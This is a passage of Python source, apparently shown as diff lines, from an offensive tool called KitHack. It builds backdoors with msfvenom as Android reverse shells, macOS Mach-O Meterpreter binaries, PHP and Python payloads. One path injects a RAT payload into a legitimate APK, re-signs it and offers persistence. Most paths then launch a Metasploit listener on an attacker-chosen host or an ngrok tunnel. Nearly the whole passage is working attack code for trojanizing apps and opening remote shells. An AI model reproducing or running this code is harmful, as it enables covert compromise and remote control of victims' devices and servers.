pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif a == '02': - print ('{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} Use the old Metasploit method'.format(WHITE, YELLOW)) - print ('{0}[02]{1} Use the new KitHack method'.format(WHITE, YELLOW)) - - m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - m = m.zfill(2) - - if m == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif m == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) - location = os.getcwd() - print("{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) - print("\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("{}\n[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - else: - print("\n{}[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - else: - print("\n{}[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - elif sys == '04': - print ('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} osx/x64/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print ('{0}[02]{1} osx/x64/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print ('{0}[03]{1} osx/x64/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[04]{1} osx/x64/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[05]{1} osx/x64/shell_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[06]{1} osx/x86/shell_reverse_tcp'.format(WHITE, YELLOW)) - - pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - pay = pay.zfill(2) - - if pay == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.macho'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_http; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.macho'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_https; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '03': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.macho'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '04': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.macho'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '05': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p osx/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.macho'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/shell_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '06': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p osx/x86/shell_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.macho'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x86/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x86/shell_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{}[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - elif sys == '05': - print ('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} php/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[02]{1} php/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[03]{1} php/reverse_php'.format(WHITE, YELLOW)) - - pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - pay = tool.zfill(2) - - if pay == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p php/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/{2}.php'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.php'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - if pay == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.php'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.php'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '03': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p php/reverse_php LHOST={0} LPORT={1} R > output/{2}.php'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.php'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/reverse_php; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/reverse_php; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("\n{}[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - elif sys == '06': - print ('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} python/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print ('{0}[02]{1} python/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print ('{0}[03]{1} python/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[04]{1} python/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[05]{1} python/shell_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[06]{1} python/shell_reverse_tcp_ssl'.format(WHITE, YELLOW)) - print ('{0}[07]{1} python/shell_reverse_udp'.format(WHITE, YELLOW)) - - pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - pay = pay.zfill(2) - - if pay == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p python/meterpreter_reverse_http LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_http; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p python/meterpreter_reverse_https LHOST={0} LPORT={1} -f raw > output/{2}.py'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.py'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_https; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '03': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET 